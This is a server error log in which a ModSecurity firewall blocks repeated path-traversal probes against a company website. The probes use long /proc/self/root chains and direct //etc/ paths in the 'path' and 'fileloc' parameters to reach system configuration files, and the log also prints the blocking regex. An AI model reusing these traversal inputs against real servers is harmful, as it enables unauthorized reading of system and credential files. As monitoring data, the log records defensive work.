[Fri Mar 20 09:22:45.838989 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.241.31:56866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08FV1pVZ5mVmJwsFNCIQAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:46.062477 2026] [:error] [pid 9818:tid 140411616036608] [client 74.7.241.31:56866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08Fl1pVZ5mVmJwsFNCIgAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:47.419501 2026] [:error] [pid 26799:tid 140411683178240] [client 216.73.216.191:40026] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08F9a6ubjKNq_cu4boEAAAA0c"]
[Fri Mar 20 09:22:47.427192 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:50960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08F-oXxyEfFpUF8f-RTgAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:48.859246 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:50974] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08GOoXxyEfFpUF8f-RUAAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:49.167249 2026] [:error] [pid 31215:tid 140411741927168] [client 216.73.216.191:40158] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab08GQF0L0L-SsrnPo55KQAAAsA"]
[Fri Mar 20 09:22:49.338980 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.241.31:50982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08GTJ3M9BSuKP7CAYvfgAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:51.349428 2026] [:error] [pid 11642:tid 140411548894976] [client 74.7.241.31:50992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08G7ninkcc-iUj5ApvCgAAA5c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:51.355629 2026] [:error] [pid 10189:tid 140411565680384] [client 216.73.216.191:40214] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08GjJ3M9BSuKP7CAYvfwAAAJU"]
[Fri Mar 20 09:22:55.979189 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.241.31:51000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08HRCii7xarUs8iHZ4kAAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:58.126259 2026] [:error] [pid 7893:tid 140411741927168] [client 74.7.241.31:42314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08IhCii7xarUs8iHZ4mAAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:58.549778 2026] [mime_magic:error] [pid 15826:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:40656] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:22:59.207773 2026] [:error] [pid 11167:tid 140411725141760] [client 216.73.216.191:40704] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab08I_HIg5MgXLBnicMHzQAAAcI"]
[Fri Mar 20 09:23:01.555606 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:42316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08JeoXxyEfFpUF8f-RYAAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:01.871677 2026] [:error] [pid 21219:tid 140411565680384] [client 216.73.216.191:40892] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08JfXLqtnMIWvjpaKq-wAAApU"]
[Fri Mar 20 09:23:02.567175 2026] [:error] [pid 9818:tid 140411733534464] [client 216.73.216.191:40940] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab08Jl1pVZ5mVmJwsFNCNwAAAEE"]
[Fri Mar 20 09:23:02.972155 2026] [:error] [pid 26799:tid 140411557287680] [client 216.73.216.191:40966] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08Jta6ubjKNq_cu4boJAAAA1Y"]
[Fri Mar 20 09:23:03.251441 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:42330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08J-oXxyEfFpUF8f-RYwAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:03.987261 2026] [:error] [pid 7893:tid 140411607643904] [client 216.73.216.191:41038] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08JxCii7xarUs8iHZ4nwAAAhA"]
[Fri Mar 20 09:23:04.849635 2026] [:error] [pid 31215:tid 140411725141760] [client 74.7.241.31:42332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08KAF0L0L-SsrnPo55PQAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:04.997940 2026] [mime_magic:error] [pid 11642:tid 140411616036608] (70014)End of file found: [client 216.73.216.191:41116] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:23:06.123154 2026] [:error] [pid 11642:tid 140411691570944] [client 216.73.216.191:41202] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08Krninkcc-iUj5ApvIQAAA4Y"]
[Fri Mar 20 09:23:06.366023 2026] [:error] [pid 31215:tid 140411590858496] [client 74.7.241.31:42346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08KgF0L0L-SsrnPo55QwAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:08.032032 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.241.31:42346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08KwF0L0L-SsrnPo55RgAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:09.910986 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.241.31:33534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08LfXLqtnMIWvjpaKrCQAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:13.656601 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:33548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08L9a6ubjKNq_cu4boOQAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
